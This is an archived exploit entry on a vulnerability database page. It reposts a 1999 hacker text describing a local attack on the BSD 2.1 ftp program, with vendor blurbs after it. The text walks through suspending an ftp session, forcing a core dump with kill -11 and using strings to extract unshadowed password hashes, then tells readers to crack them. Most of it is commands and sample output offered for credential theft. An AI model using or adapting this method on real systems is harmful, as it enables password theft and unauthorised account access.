Lucene search
K

BSD 2.1 FTP.Core Local Exploit

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 7 Views

Local exploit in BSD 2.1 FTP reveals sensitive data through core dump manipulation.

Code
`FTP.CORE attack for BSD 2.1  
-----------------------------------------------------------------------------------------------------------------  
by The Bronc Buster   
[email protected]  
http://www2.succeed.net/~bbuster  
Made for The Infected  
www.infected.com  
-----------------------------------------------------------------------------------------------------------------  
  
This is a relativly simple attack, and can be done as ANY LEGIT user on a BSD 2.1 system. The focus of this attack is to get the ftp daemond to produce a core dump. When it dumps, all the information it has used up to the point it dumps will be stored in a file, in the the directory you are in, called "ftp.core". This file will contain shell and enviornment varibles, paths, and other misc stuff. What we will be looking for is the unshadowed passwd file. As this process has to access the passwd file to make sure you're legit, it stores all the information proir to your user in a buffer, and it will have to unshadow , or access the shadowed file, to do this. After you get the encrypted passwords, go find a copy of Cracker Jack and get to work. Ok, how to do it:  
  
  
#ftp foobar.com  
Welcom to foobar.com ftp site  
blah blah blah  
please enter login name> evil  
that user requires a password> evil2  
User evil loged in welcome to foobar.com!  
Remote set to type BIN  
ftp>  
  
(now hit ^Z to suspend the process)  
  
#ps  
PID TT STAT TIME COMMAND  
9526 p0 Ss 0:00.12 -csh (csh)  
9539 p0 R+ 0:00.02 ps  
1000 p0 Ss 0:00.22 ftp  
  
(get the PID number to the ftp process)  
  
#kill -11 1000  
  
(kill the process)  
  
#fg  
  
(bring the ftp back to the foreground)  
  
Process Killed Core Dump  
#ls  
home mail public_html ftp.core  
#strings ftp.core > test  
#pico test  
  
From this point you have the .core in pico and should be able to pick it clean of all passwords and other information you might be interested in.  
  
This has only been tested, and worked on BSD 2.1 so far, if it works on other systems, feel free to modify this text to reflect it.  
  
Bronc Buster  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation